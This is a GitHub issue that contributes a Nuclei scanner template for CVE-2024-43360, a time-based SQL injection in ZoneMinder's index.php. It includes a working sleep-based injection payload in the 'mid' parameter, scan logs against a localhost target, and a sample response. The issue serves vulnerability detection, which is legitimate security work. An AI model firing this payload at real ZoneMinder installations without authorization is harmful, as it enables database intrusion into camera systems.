Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Template for CVE-2024-43360 - Zoneminder time based SQLi #10669

Open
securitytaters opened this issue Sep 3, 2024 · 0 comments
Open

Template for CVE-2024-43360 - Zoneminder time based SQLi #10669

securitytaters opened this issue Sep 3, 2024 · 0 comments
Assignees
@ritikchaddha
Labels
nuclei-template Nuclei template contribution

Comments

@securitytaters
Copy link

Template Information:

ZoneMinder is a free, open source Closed-circuit television software application developed for Linux which supports IP, USB and Analog cameras. Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability. Advisory link below
GHSA-9cmr-7437-v9fj

Nuclei Template:

id: CVE-2024-43360

info:
  name: ZoneMinder time based sql injection detection
  author: securitytaters
  severity: Critical
  description: |
    Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability.
  reference:
    - http://
  tags: cve2024,cve,zoneminder,sqli

variables:
  username: ''
  
http:
  - raw:
      - |
        @timeout: 20s
        GET /index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=14'
          - 'status_code == 200'
          - 'contains_all(body,"{\"result\":\"Ok\",\"rows\":[")'
          - 'contains_all(content_type,"application/json")'
        condition: and

Template results

[VER] Started metrics server at localhost:9092
[WRN] Found 32 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.1 (outdated)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2024-43360] Sent HTTP request to http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request
[CVE-2024-43360] [http] [critical] http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request

Sample response

HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Tue, 03 Sep 2024 06:41:51 GMT
Content-Type: application/json
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 25

{"result":"Ok","rows":[]}
@securitytaters securitytaters added the nuclei-template Nuclei template contribution label Sep 3, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ritikchaddha ritikchaddha

Labels
nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ritikchaddha @securitytaters